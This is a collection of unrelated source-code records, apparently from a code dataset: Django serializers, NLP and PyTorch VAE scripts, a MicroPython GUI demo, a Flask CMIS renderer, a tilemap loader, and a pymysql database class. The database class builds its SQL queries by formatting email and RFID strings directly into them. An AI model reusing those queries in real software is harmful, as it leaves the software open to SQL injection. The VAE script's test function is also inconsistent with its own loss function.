validated_data.get('Garage_Type', instance.Garage_Type)\n instance.Make = validated_data.get('Make', instance.Make)\n instance.Area_Garage = validated_data.get('Area_Garage', instance.Area_Garage)\n instance.Region_ID = validated_data.get('Region_ID', instance.Region_ID)\n instance.save()\n return instance\n\n\nclass Owner_DetailSerializer(serializers.ModelSerializer):\n class Meta:\n model = Owner_Detail\n fields = ('Owner_ID', 'Owner_Name', 'Owner_Number', 'POC', 'Address')\n\n def create(self, validated_data):\n \"\"\"\n Create and return a new `Owner_Detail` instance, given the validated data.\n \"\"\"\n return Owner_Detail.objects.create(**validated_data)\n\n def make_validations(self, instance, data):\n \"\"\"\n return validated_data from data for `Owner_Detail` instance\n \"\"\"\n data['Owner_ID'] = data.get('Owner_ID', instance.Owner_ID)\n data['Owner_Name'] = data.get('Owner_Name', instance.Owner_Name)\n data['Owner_Number'] = data.get('Owner_Number', instance.Owner_Number)\n data['POC'] = data.get('POC', instance.POC)\n data['Address'] = data.get('Address', instance.Address)\n return data\n\n def getFormData(self, request):\n \"\"\"\n Return Form Data from POST Request\n \"\"\"\n data = {}\n datatype = {}\n datatype['Owner_ID'] = \"INT\"\n datatype['Owner_Name'] = \"CHAR\"\n datatype['Owner_Number'] = \"INT\"\n datatype['POC'] = \"CHAR\"\n datatype['Address'] = \"CHAR\"\n for field in self.fields.keys():\n data[field] = request.POST.get(field, None)\n if data[field] != None:\n data[field] = dataTypeConverter(data[field], datatype[field])\n return data\n\n def getRelatedAttributes(self):\n related_attributes = []\n return related_attributes\n\n def update(self, instance, validated_data):\n \"\"\"\n Update and return an existing `Owner_Detail` instance, given the validated data.\n \"\"\"\n instance.Owner_ID = validated_data.get('Owner_ID', instance.Owner_ID)\n instance.Owner_Name = validated_data.get('Owner_Name', instance.Owner_Name)\n instance.Owner_Number = validated_data.get('Owner_Number', instance.Owner_Number)\n instance.POC = validated_data.get('POC', instance.POC)\n instance.Address = validated_data.get('Address', instance.Address)\n instance.save()\n return instance\n\n\nclass Garage_DetailSerializer(serializers.ModelSerializer):\n class Meta:\n model = Garage_Detail\n fields = ('Garage_Detail_ID', 'Equipment_Name', 'Number_Of_Two_Post_Lift', 'Washing_Bay', 'Paint_Booth',\n 'Scanning_Tool_Kit', 'No_Of_Mechanics', 'Working_Staff', 'Service_Capacity', 'Visited_By',\n 'Garage_ID')\n\n def create(self, validated_data):\n \"\"\"\n Create and return a new `Garage_Detail` instance, given the validated data.\n \"\"\"\n return Garage_Detail.objects.create(**validated_data)\n\n def make_validations(self, instance, data):\n \"\"\"\n return validated_data from data for `Garage_Detail` instance\n \"\"\"\n data['Garage_Detail_ID'] = data.get('Garage_Detail_ID', instance.Garage_Detail_ID)\n data['Equipment_Name'] = data.get('Equipment_Name', instance.Equipment_Name)\n data['Number_Of_Two_Post_Lift'] = data.get('Number_Of_Two_Post_Lift', instance.Number_Of_Two_Post_Lift)\n data['Washing_Bay'] = data.get('Washing_Bay', instance.Washing_Bay)\n data['Paint_Booth'] = data.get('Paint_Booth', instance.Paint_Booth)\n data['Scanning_Tool_Kit'] = data.get('Scanning_Tool_Kit', instance.Scanning_Tool_Kit)\n data['No_Of_Mechanics'] = data.get('No_Of_Mechanics', instance.No_Of_Mechanics)\n data['Working_Staff'] = data.get('Working_Staff', instance.Working_Staff)\n data['Service_Capacity'] = 
data.get('Service_Capacity', instance.Service_Capacity)\n data['Visited_By'] = data.get('Visited_By', instance.Visited_By)\n data['Garage_ID'] = data.get('Garage_ID', instance.Garage_ID)\n return data\n\n def getFormData(self, request):\n \"\"\"\n Return Form Data from POST Request\n \"\"\"\n data = {}\n datatype = {}\n datatype['Garage_Detail_ID'] = \"INT\"\n datatype['Equipment_Name'] = \"CHAR\"\n datatype['Number_Of_Two_Post_Lift'] = \"INT\"\n datatype['Washing_Bay'] = \"CHAR\"\n datatype['Paint_Booth'] = \"CHAR\"\n datatype['Scanning_Tool_Kit'] = \"CHAR\"\n datatype['No_Of_Mechanics'] = \"INT\"\n datatype['Working_Staff'] = \"INT\"\n datatype['Service_Capacity'] = \"INT\"\n datatype['Visited_By'] = \"CHAR\"\n datatype['Garage_ID'] = \"INT\"\n for field in self.fields.keys():\n data[field] = request.POST.get(field, None)\n if data[field] != None:\n data[field] = dataTypeConverter(data[field], datatype[field])\n return data\n\n def getRelatedAttributes(self):\n related_attributes = ['Garage_ID']\n return related_attributes\n\n def update(self, instance, validated_data):\n \"\"\"\n Update and return an existing `Garage_Detail` instance, given the validated data.\n \"\"\"\n instance.Garage_Detail_ID = validated_data.get('Garage_Detail_ID', instance.Garage_Detail_ID)\n instance.Equipment_Name = validated_data.get('Equipment_Name', instance.Equipment_Name)\n instance.Number_Of_Two_Post_Lift = validated_data.get('Number_Of_Two_Post_Lift',\n instance.Number_Of_Two_Post_Lift)\n instance.Washing_Bay = validated_data.get('Washing_Bay', instance.Washing_Bay)\n instance.Paint_Booth = validated_data.get('Paint_Booth', instance.Paint_Booth)\n instance.Scanning_Tool_Kit = validated_data.get('Scanning_Tool_Kit', instance.Scanning_Tool_Kit)\n instance.No_Of_Mechanics = validated_data.get('No_Of_Mechanics', instance.No_Of_Mechanics)\n instance.Working_Staff = validated_data.get('Working_Staff', instance.Working_Staff)\n instance.Service_Capacity = validated_data.get('Service_Capacity', instance.Service_Capacity)\n instance.Visited_By = validated_data.get('Visited_By', instance.Visited_By)\n instance.Garage_ID = validated_data.get('Garage_ID', instance.Garage_ID)\n instance.save()\n return instance\n\n\nclass Garage_ServiceSerializer(serializers.ModelSerializer):\n class Meta:\n model = Garage_Service\n fields = ('Garage_Service_ID', 'Service_ID', 'Garage_ID', 'Cat_ID', 'SubCat_ID', 'SubSubCat_ID')\n\n def create(self, validated_data):\n \"\"\"\n Create and return a new `Garage_Service` instance, given the validated data.\n \"\"\"\n return Garage_Service.objects.create(**validated_data)\n\n def make_validations(self, instance, data):\n \"\"\"\n return validated_data from data for `Garage_Service` instance\n \"\"\"\n data['Garage_Service_ID'] = data.get('Garage_Service_ID', instance.Garage_Service_ID)\n data['Service_ID'] = data.get('Service_ID', instance.Service_ID)\n data['Garage_ID'] = data.get('Garage_ID', instance.Garage_ID)\n data['Cat_ID'] = data.get('Cat_ID', instance.Cat_ID)\n data['SubCat_ID'] = data.get('SubCat_ID', instance.SubCat_ID)\n data['SubSubCat_ID'] = data.get('SubSubCat_ID', instance.SubSubCat_ID)\n return data\n\n def getFormData(self, request):\n \"\"\"\n Return Form Data from POST Request\n \"\"\"\n data = {}\n datatype = {}\n datatype['Garage_Service_ID'] = \"INT\"\n datatype['Service_ID'] = \"INT\"\n datatype['Garage_ID'] = \"INT\"\n datatype['Cat_ID'] = \"INT\"\n datatype['SubCat_ID'] = \"INT\"\n datatype['SubSubCat_ID'] = \"INT\"\n for field in self.fields.keys():\n data[field] 
= request.POST.get(field, None)\n if data[field] != None:\n data[field] = dataTypeConverter(data[field], datatype[field])\n return data\n\n def getRelatedAttributes(self):\n related_attributes = ['Service_ID', 'Garage_ID', 'Cat_ID', 'SubCat_ID', 'SubSubCat_ID']\n return related_attributes\n\n def update(self, instance, validated_data):\n \"\"\"\n Update and return an existing `Garage_Service` instance, given the validated data.\n \"\"\"\n instance.Garage_Service_ID = validated_data.get('Garage_Service_ID', instance.Garage_Service_ID)\n instance.Service_ID = validated_data.get('Service_ID', instance.Service_ID)\n instance.Garage_ID = validated_data.get('Garage_ID', instance.Garage_ID)\n instance.Cat_ID = validated_data.get('Cat_ID', instance.Cat_ID)\n instance.SubCat_ID = validated_data.get('SubCat_ID', instance.SubCat_ID)\n instance.SubSubCat_ID = validated_data.get('SubSubCat_ID', instance.SubSubCat_ID)\n instance.save()\n return instance\n","sub_path":"carcrew/garageApp/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":13223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"75030035","text":"\n# coding: utf-8\n\n# In[1]:\n\n\n\nfrom sklearn.feature_extraction.text import CountVectorizer\n2\n#from sklearn.feature_extraction.text import TfidfVectorizer\nvect=CountVectorizer(binary=True) #explore other parameters to\ncorpus=[\"Tesseract is good optical character recognition engine\",\"optical character rcognition is different\"]\nvect.fit(corpus)\nprint(vect.transform([\"Today is good optical\"]).toarray())\n#print(vect.transform(corpus).toarray())\n\n","sub_path":"nlp/Count_Vectorizer.py","file_name":"Count_Vectorizer.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"456050703","text":"from django.test import TestCase\nfrom django.urls import reverse\n\nfrom api.serializers.commerce import ProductSerializer\n\nfrom ..factories import ProductFactory, ShopFactory\n\n\nclass WhenUserGetShopProductTrending(TestCase):\n \"\"\"\n [Test if user can get products]\n\n Arguments:\n TestCase {[type]} -- [description]\n \"\"\"\n\n def setUp(self):\n \"\"\"\n [Sets up the testing database]\n \"\"\"\n self.shop = ShopFactory()\n self.product = ProductFactory(shop_rel=self.shop)\n self.response = self.client.get(\n reverse(\n \"api:shop_trending_product\",\n kwargs={\"slug\": self.shop.slug, \"cat\": self.product.genre[\"slug\"]},\n ),\n content_type=\"application/json\",\n )\n\n def test_response_code(self):\n \"\"\"\n [Test if there are no errors]\n \"\"\"\n assert self.response.status_code == 200\n\n def test_products_returned(self):\n \"\"\"\n [Check if the info are returned]\n \"\"\"\n product = ProductSerializer(self.product)\n assert self.response.json()[\"results\"] == [product.data]\n","sub_path":"tests/store/test_user_can_see_shop_trending_product.py","file_name":"test_user_can_see_shop_trending_product.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"55935939","text":"from __future__ import print_function\nimport argparse\nimport torch\nimport torch.utils.data\nimport os\nimport scipy.io as sio\nfrom torch import nn, optim\nfrom torch.autograd import Variable\n#from torch.nn import functional as F\nfrom torchvision import datasets, transforms\nfrom torchvision.utils import save_image\n\n# constants defined at the 
beginning\nseq_length=201\ninput_dim=1862\nbatch_size=17\nn_samples=37\nisAnnealing=1\n\n\nparser = argparse.ArgumentParser(description='VAE MNIST Example')\nparser.add_argument('--batch-size', type=int, default=128, metavar='N',\n help='input batch size for training (default: 128)')\nparser.add_argument('--epochs', type=int, default=10, metavar='N',\n help='number of epochs to train (default: 10)')\nparser.add_argument('--no-cuda', action='store_true', default=False,\n help='enables CUDA training')\nparser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\nparser.add_argument('--log-interval', type=int, default=10, metavar='N',\n help='how many batches to wait before logging training status')\nargs = parser.parse_args()\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\n\n\n\ntorch.manual_seed(args.seed)\nif args.cuda:\n torch.cuda.manual_seed(args.seed)\n\n\nkwargs = {'num_workers': 1, 'pin_memory': True} if args.cuda else {}\ntrain_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=True, download=True,\n transform=transforms.ToTensor()),\n batch_size=args.batch_size, shuffle=True, **kwargs)\ntest_loader = torch.utils.data.DataLoader(\n datasets.MNIST('../data', train=False, transform=transforms.ToTensor()),\n batch_size=args.batch_size, shuffle=True, **kwargs)\n\n#To import data\nos.chdir(\"../DataSingle/\")\npath_data=os.getcwd()\nos.chdir(\"../VAE_Pytorch/\")\n#data import portion ends\n\nclass VAE(nn.Module):\n def __init__(self):\n super(VAE, self).__init__()\n\n self.fc1 = nn.LSTM(input_dim, 800)\n self.fc21 = nn.Linear(800, 50)\n self.fc22 = nn.Linear(800, 50)\n self.fc3 = nn.Linear(50, 800)\n self.fc41 = nn.LSTM(800, input_dim)\n self.fc42 = nn.LSTM(800, input_dim)\n self.relu = nn.ReLU()\n self.sigmoid = nn.Sigmoid()\n\n\n def encode(self, x):\n out, hidden=self.fc1(x)\n h1 = self.relu(out)\n return self.fc21(h1), self.fc22(h1)\n\n def reparameterize(self, mu, logvar):\n if self.training:\n std = logvar.mul(0.5).exp_()\n eps = Variable(std.data.new(std.size()).normal_())\n return eps.mul(std).add_(mu)\n else:\n return mu\n\n def decode(self, z):\n h3 = self.relu(self.fc3(z))\n out1,hidden1=self.fc41(h3)\n out2, hidden2 = self.fc42(h3)\n return self.sigmoid(out1), (out2)\n\n def forward(self, x):\n mu, logvar = self.encode(x)\n z = self.reparameterize(mu, logvar)\n muTheta,logvarTheta=self.decode(z)\n return muTheta,logvarTheta, mu, logvar\n\n\nmodel = VAE()\nif args.cuda:\n model.cuda()\n\n\ndef loss_function(muTheta,logvarTheta, x, mu, logvar,annealParam):\n #tol=1e-8\n #BCE = -torch.sum(torch.mul(x,torch.log(tol+recon_x))+(1-x).mul(torch.log(1+tol-recon_x)))\n diffSq=(x-muTheta).pow(2)\n precis=torch.exp(-logvarTheta)\n #print('Sum logvar:',torch.sum(logvarTheta))\n #print('Sumerror: ',torch.sum(diffSq))\n #print('SumerrordivVar: ', torch.sum(torch.mul(diffSq,precis)))\n BCE=0.5*torch.sum(logvarTheta+torch.mul(diffSq,precis))\n BCE/=(batch_size * input_dim*seq_length)\n\n # see Appendix B from VAE paper:\n # Kingma and Welling. Auto-Encoding Variational Bayes. 
ICLR, 2014\n # https://arxiv.org/abs/1312.6114\n # 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)\n KLD = -0.5 * annealParam*torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n # Normalise by same number of elements as in reconstruction\n KLD /= batch_size * 50*seq_length\n\n return BCE + KLD\n\n\noptimizer = optim.Adam(model.parameters(), lr=1e-3)\n\ndef prepareData(train_loader, seq_length, batch_index):\n index_start=batch_index*seq_length\n index_end=index_start+seq_length\n for i, (data, _) in enumerate(train_loader):\n data=data.view(-1,input_dim)\n data=data.resize_((batch_size,input_dim,1))\n if i==index_start:\n outData=data\n elif i > index_start and i < index_end:\n outData=torch.cat((outData,data),2)\n return outData.permute(2,0,1)\ndef train(epoch):\n model.train()\n train_loss = 0\n seg_range = list(range(0, 17))\n j = 1\n while j < input_dim:\n # Loop over all segments\n for i in seg_range:\n # batch_xs, _ = mnist.train.next_batch(batch_size)\n\n # print (i,',',j)\n TrainData = sio.loadmat(path_data + '/TmpSeg' + str(i) + 'exc' + str(j) + '.mat')\n\n zz = torch.FloatTensor(TrainData['U'])\n U=zz.contiguous().view(seq_length, 1, -1)\n #print(U)\n if i == 0:\n outData = U\n elif i > 0 and i < 17:\n outData = torch.cat((outData, U), 1)\n\n data = Variable(outData) #sequence length, batch size, input size\n #print(data.size())\n if args.cuda:\n data = data.cuda()\n optimizer.zero_grad()\n muTheta,logvarTheta, mu, logvar = model(data)\n if epoch<50:\n annealParam=0\n elif epoch <500:\n annealParam=(epoch/500)\n else:\n annealParam=1\n loss = loss_function(muTheta,logvarTheta, data, mu, logvar,annealParam)\n loss.backward()\n train_loss += loss.data[0]\n optimizer.step()\n\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, j, 50*n_samples,\n 100. * j / (50*n_samples),\n loss.data[0] ))\n j=j+50\n\n print('====> Epoch: {} Average loss: {:.4f}'.format(\n epoch, train_loss / n_samples))\n\n\ndef test(epoch):\n model.eval()\n test_loss = 0\n for i, (data, _) in enumerate(test_loader):\n if args.cuda:\n data = data.cuda()\n data = Variable(data, volatile=True)\n recon_batch, mu, logvar = model(data)\n test_loss += loss_function(recon_batch, data, mu, logvar).data[0]\n if i == 0:\n n = min(data.size(0), 8)\n comparison = torch.cat([data[:n],\n recon_batch.view(args.batch_size, 1, 28, 28)[:n]])\n save_image(comparison.data.cpu(),\n 'results/reconstruction_' + str(epoch) + '.png', nrow=n)\n\n test_loss /= len(test_loader.dataset)\n print('====> Test set loss: {:.4f}'.format(test_loss))\n\ndef save_checkpoint(state, filename='checkpoint.pth.tar'):\n torch.save(state, filename)\n\nfor epoch in range(1, args.epochs + 1):\n train(epoch)\n if (epoch % 100==0):\n save_checkpoint({\n 'epoch': epoch ,\n 'state_dict': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n }, 'output/modelGaussAn' + str(epoch))\n '''\n test(epoch)\n sample = Variable(torch.randn(64, 20))\n if args.cuda:\n sample = sample.cuda()\n sample = model.decode(sample).cpu()\n save_image(sample.data.view(64, 1, 28, 28),\n 'results/sample_' + str(epoch) + '.png')\n '''\n","sub_path":"SeqVaeAligned.py","file_name":"SeqVaeAligned.py","file_ext":"py","file_size_in_byte":7380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"613763607","text":"#!/usr/bin/env python\n\n\"\"\"\n*****************************************************************\nLicensed Materials - Property of IBM\n(C) Copyright IBM Corp. 2020. 
All Rights Reserved.\nUS Government Users Restricted Rights - Use, duplication or\ndisclosure restricted by GSA ADP Schedule Contract with IBM Corp.\n*****************************************************************\n\n*******************************************************************************\nScript: validate_env.py\n\nSummary:\n Performs syntactic validation on environment files used by build_env.py from\n the open-ce project.\n\nDescription:\n This script will take a YAML build env file and will check that file and all\n dependencies for syntactic errors.\n\n*******************************************************************************\n\"\"\"\n\nimport sys\nimport env_config\nimport utils\n\ndef make_parser():\n ''' Parser for input arguments '''\n arguments = [utils.Argument.ENV_FILE, utils.Argument.PYTHON_VERSIONS,\n utils.Argument.BUILD_TYPES]\n parser = utils.make_parser(arguments,\n description = 'Lint Environment Files')\n return parser\n\ndef validate_env(arg_strings=None):\n '''\n Entry function.\n '''\n parser = make_parser()\n args = parser.parse_args(arg_strings)\n variants = [{ 'python' : py_vers, 'build_type' : build_type } for py_vers in utils.parse_arg_list(args.python_versions)\n for build_type in utils.parse_arg_list(args.build_types)]\n retval = 0\n for variant in variants:\n result,_ = env_config.load_env_config_files(args.env_config_file, variant)\n retval += result\n\n return retval\n\nif __name__ == '__main__':\n sys.exit(validate_env())\n","sub_path":"open-ce/validate_env.py","file_name":"validate_env.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"121694578","text":"# Continue Method\r\n\r\nstring = 'Python'\r\n\r\nx = 0\r\nwhile x < len(string):\r\n if string[x] == \"y\":\r\n x = x + 1\r\n continue\r\n else:\r\n print(string[x])\r\n x += 1\r\n\r\n# Break Method\r\n\r\nliste = ['Ship','Vehicle','Train','Plane']\r\n\r\nx = 0\r\nwhile True:\r\n if liste[x] == 'Vehicle':\r\n x += 1\r\n continue\r\n elif x == len(liste)-1:\r\n break\r\n else:\r\n print(liste[x])\r\n x += 1\r\n\r\n# Selection Making\r\n\r\nquest = int(input(\"Selection #1\\nSelection #2\\nYour choice: \"))\r\n\r\nwhile True:\r\n if quest == 1:\r\n print(\"Selection number 1 has choosen.\")\r\n break\r\n elif quest == 2:\r\n print(\"Selection number 2 has choosen.\")\r\n break\r\n else:\r\n print(\"Did the wrong choice.\")\r\n break","sub_path":"src/Loops/BreakContinue.py","file_name":"BreakContinue.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"189655819","text":"from flask import render_template\n\n# TEMP\nROOT = \"http://localhost:5000/cmis/atompub\"\nXML_HEADER = \"\\n\"\n\n\nclass Feed(object):\n def __init__(self, object, collection):\n self.object = object\n self.collection = collection\n\n def to_xml(self, **options):\n ctx = {'ROOT': ROOT, 'object': self.object,\n 'collection': self.collection, 'to_xml': to_xml}\n return render_template(\"cmis/feed.xml\", **ctx)\n\n\nclass Entry(object):\n def __init__(self, obj):\n self.obj = obj\n\n def to_xml(self, **options):\n ctx = {'ROOT': ROOT, 'folder': self.obj, 'document': self.obj,\n 'options': options, 'to_xml': to_xml}\n\n if self.obj.sbe_type == 'cmis:folder':\n result = render_template(\"cmis/folder.xml\", **ctx)\n elif self.obj.sbe_type == 'cmis:document':\n result = render_template(\"cmis/document.xml\", **ctx)\n else:\n raise 
Exception(\"Unknown base object type: %s\" % self.obj.sbe_type)\n\n if not 'no_xml_header' in options:\n result = XML_HEADER + result\n\n return result\n\n\ndef to_xml(obj, **options):\n entry = Entry(obj)\n return entry.to_xml(**options)\n","sub_path":"abilian/sbe/apps/documents/cmis/renderer.py","file_name":"renderer.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"607959451","text":"# scale_ctrl_test.py Test/demo of ScaleCtrl widget for Pybboard RA8875 GUI\n\n# Released under the MIT License (MIT). See LICENSE.\n# Copyright (c) 2021 Peter Hinch\n\n# Usage:\n# import micropython_ra8875.demos.scale_ctrl_test\n\nimport uasyncio as asyncio\nfrom micropython_ra8875.py.colors import *\nfrom micropython_ra8875.py.ugui import Screen\nfrom micropython_ra8875.fonts import font10, font14\nfrom micropython_ra8875.widgets.buttons import Button\nfrom micropython_ra8875.widgets.label import Label\nfrom micropython_ra8875.widgets.scale_ctrl import ScaleCtrl\nfrom micropython_ra8875.widgets.scale_log import ScaleLog\nfrom micropython_ra8875.driver.tft_local import setup # Local wiring\n\n# Arguments common to sets of controls\nbuttons = {'font': font14,\n 'width': 80,\n 'height': 30,\n 'shape': RECTANGLE,\n 'fontcolor': BLACK, }\n\nlabels = {'font': font14,\n 'width': 140,\n 'border': 2,\n 'fontcolor': WHITE,\n 'bgcolor': DARKGREEN,\n 'fgcolor': RED, }\n\nscales = {'font': font10,\n 'width': 350,\n 'height': 60,\n 'pointercolor': RED,\n 'fontcolor': YELLOW,\n 'fgcolor': GREEN,\n 'bgcolor': BLACK, }\n\n# STANDARD BUTTONS\n\ndef quitbutton(x, y):\n def quit(button):\n Screen.shutdown()\n Button((x, y), callback = quit, fgcolor = RED, text = 'Quit', **buttons)\n\ndef fwdbutton(x, y, cls_screen, text='Next'):\n def fwd(button):\n Screen.change(cls_screen)\n Button((x, y), callback = fwd, fgcolor = GREEN, text = text, **buttons)\n\ndef backbutton(x, y):\n def back(button):\n Screen.back()\n Button((x, y), callback = back, fgcolor = CYAN, text = 'Back', **buttons)\n\nclass linearScreen(Screen):\n def __init__(self):\n super().__init__()\n\n # Scale 0 with custom variable and legends.\n Label((0, 0), font = font14, value = 'FM radio scale 88-108MHz.')\n lbl_result0 = Label((0, 240), **labels)\n # Define callbacks for scale 0\n def legendcb(f):\n return '{:2.0f}'.format(88 + ((f + 1) / 2) * (108 - 88))\n\n def scale_move0(scale):\n sv = scale.value()\n sv = (sv + 1) / 2 # 0 <= sv <= 1\n lbl_result0.value('{:6.2f}'.format(sv*(108 - 88) + 88))\n\n self.scale0 = ScaleCtrl((0, 30), legendcb = legendcb,\n cb_move=scale_move0, **scales)\n # Scale 1 with varying color.\n Label((0, 130), font = font14, value = 'Default scale -1 to +1, varying colors.')\n lbl_result1 = Label((200, 240), **labels)\n # Define callbacks for scale 1\n def tickcb(f, c):\n if f > 0.8:\n return RED\n if f < -0.8:\n return BLUE\n return c\n\n def scale_move1(scale):\n sv = scale.value()\n lbl_result1.value('{:4.3f}'.format(sv))\n\n self.scale1 = ScaleCtrl((0, 160), tickcb = tickcb,\n cb_move=scale_move1, **scales)\n # Define buttons\n x = 390\n y = 242\n backbutton(x, y)\n #Button((x, y), fgcolor = RED, text = 'Quit',\n #callback = lambda _: Screen.shutdown(), **buttons)\n y -= 50\n Button((x, y), fgcolor = GREEN, text = 'Enable',\n callback = self.en, **buttons)\n y -= 50\n Button((x, y), fgcolor = YELLOW, text = 'Disable',\n callback = self.dis, **buttons)\n y -= 50\n Button((x, y), fgcolor = BLUE, text = 'Zero',\n callback = lambda _: 
self.scale1.value(0), **buttons)\n\n\n def en(self, _): # Discard button arg\n self.scale0.greyed_out(False)\n self.scale1.greyed_out(False)\n\n def dis(self, _):\n self.scale0.greyed_out(True)\n self.scale1.greyed_out(True)\n\nclass LogScreen(Screen):\n def __init__(self):\n super().__init__()\n\n # Scale 0\n Label((0, 0), font = font14, value = 'Default scale 5 decades.')\n lbl_result0 = Label((0, 240), **labels)\n # Define callbacks for scale 0\n def legendcb(f):\n if f < 999:\n return '{:<1.0f}'.format(f)\n return '{:<1.0f}K'.format(f/1000)\n\n def scale_move0(scale):\n sv = scale.value()\n lbl_result0.value('{:6.2f}'.format(sv))\n self.scale1.value(scale.value()) # Cause lower scale to mimic this one\n\n self.scale0 = ScaleLog((0, 30), legendcb = legendcb, value=15,\n cb_move=scale_move0, **scales)\n # Scale 1 with varying color.\n Label((0, 130), font = font14, value = 'Varying colors, follows top scale.')\n lbl_result1 = Label((200, 240), **labels)\n # Define callbacks for scale 1\n def tickcb(f, c):\n if f > 30000:\n return RED\n if f < 10:\n return BLUE\n return c\n\n def scale_move1(scale):\n sv = scale.value()\n lbl_result1.value('{:6.2f}'.format(sv))\n\n self.scale1 = ScaleLog((0, 160), tickcb = tickcb,\n cb_move=scale_move1, **scales)\n # Define buttons\n x = 390\n y = 242\n backbutton(x, y)\n y -= 50\n Button((x, y), fgcolor = GREEN, text = 'Enable',\n callback = self.en, **buttons)\n y -= 50\n Button((x, y), fgcolor = YELLOW, text = 'Disable',\n callback = self.dis, **buttons)\n y -= 50\n Button((x, y), fgcolor = BLUE, text = 'Reset',\n callback = lambda _: self.scale1.value(1), **buttons)\n\n\n def en(self, _): # Discard button arg\n self.scale0.greyed_out(False)\n self.scale1.greyed_out(False)\n\n def dis(self, _):\n self.scale0.greyed_out(True)\n self.scale1.greyed_out(True)\n\nclass ChoiceScreen(Screen):\n def __init__(self):\n super().__init__()\n Label((0, 0), font = font14, value = 'Demo of linear and log scale controls.')\n fwdbutton(10, 50, linearScreen, 'Linear')\n fwdbutton(10, 100, LogScreen, 'Log')\n quitbutton(200, 242)\n \ndef test():\n setup()\n Screen.change(ChoiceScreen)\n\ntest()\n","sub_path":"demos/scale_ctrl_test.py","file_name":"scale_ctrl_test.py","file_ext":"py","file_size_in_byte":6212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"7036655","text":"from flask import url_for, redirect\nimport pymysql, hashlib\n\nclass Database:\n global keyId\n keyId = '_USER_'\n def __init__(self,db = 'crm'):\n self.conn = pymysql.connect(host='127.0.0.1', port=3306, user='root', passwd='', database=db)\n \n def connection(self):\n return self.conn\n\n def getcursor(self):\n self.cursor = self.conn.cursor(pymysql.cursors.DictCursor)\n return self.cursor\n\n def initial_setup(self):\n sql = open('app/crm.sql').read()\n\n split = sql.split(';')\n\n for i in range(0,len(split)):\n split[i] = split[i].replace('\\n',' ')\n\n del split[-1]\n\n for sql in split:\n db = self.conn.cursor()\n db.execute(sql)\n self.conn.commit()\n return 1\n\n # VerifyRfid will only allow the authentic user to open dashboard, contacts...\n def VerifyRfid(self, browserId, em):\n if self.conn:\n cur = self.conn.cursor()\n query = cur.execute(\"\"\" SELECT EMAIL, RFID FROM `login_main` WHERE EMAIL='{}' AND RFID='{}' \"\"\".format(em, browserId))\n if query == True:\n return True\n else:\n return False\n\n\n def get_username(self, rfid):\n if rfid is not None:\n if self.conn:\n cur = self.conn.cursor(pymysql.cursors.DictCursor)\n status = 
cur.execute(\"\"\"SELECT USERNAME FROM `login_main` WHERE RFID = '{}' \"\"\".format(rfid))\n\n if status > 0:\n data = cur.fetchone()\n return data['USERNAME']\n\n\n\n\n\n\n\n\n \n","sub_path":"app/model/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"294293749","text":"###################################\n## Driftwood 2D Game Dev. Suite ##\n## map.py ##\n## Copyright 2014 PariahSoft LLC ##\n###################################\n\n## **********\n## Permission is hereby granted, free of charge, to any person obtaining a copy\n## of this software and associated documentation files (the \"Software\"), to\n## deal in the Software without restriction, including without limitation the\n## rights to use, copy, modify, merge, publish, distribute, sublicense, and/or\n## sell copies of the Software, and to permit persons to whom the Software is\n## furnished to do so, subject to the following conditions:\n##\n## The above copyright notice and this permission notice shall be included in\n## all copies or substantial portions of the Software.\n##\n## THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n## IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n## FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n## AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n## LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n## FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n## IN THE SOFTWARE.\n## **********\n\nimport layer\nimport tileset\n\n\nclass Tilemap:\n \"\"\"This class reads the Tiled map file for the currently focused area, and presents an abstraction.\n\n Attributes:\n area: Parent AreaManager instance.\n\n width: Width of the map in tiles.\n height: Height of the map in tiles.\n tilewidth: Width of tiles in the map.\n tileheight: Height of tiles in the map.\n properties: A dictionary containing map properties.\n\n layers: The list of Layer class instances for each layer.\n tilesets: The list of Tileset class instances for each tileset.\n \"\"\"\n\n def __init__(self, area):\n \"\"\"Tilemap class initializer.\n\n Args:\n area: Link back to the parent AreaManager instance.\n \"\"\"\n self.area = area\n\n # Attributes which will be updated with information about the map.\n self.width = 0\n self.height = 0\n self.tilewidth = 0\n self.tileheight = 0\n self.properties = {}\n\n self.layers = []\n self.tilesets = []\n\n # This contains the JSON of the Tiled map.\n self.__tilemap = {}\n\n def _read(self, data):\n \"\"\"Read and abstract a Tiled map.\n\n Reads the JSON Tiled map and processes its information into useful abstractions. 
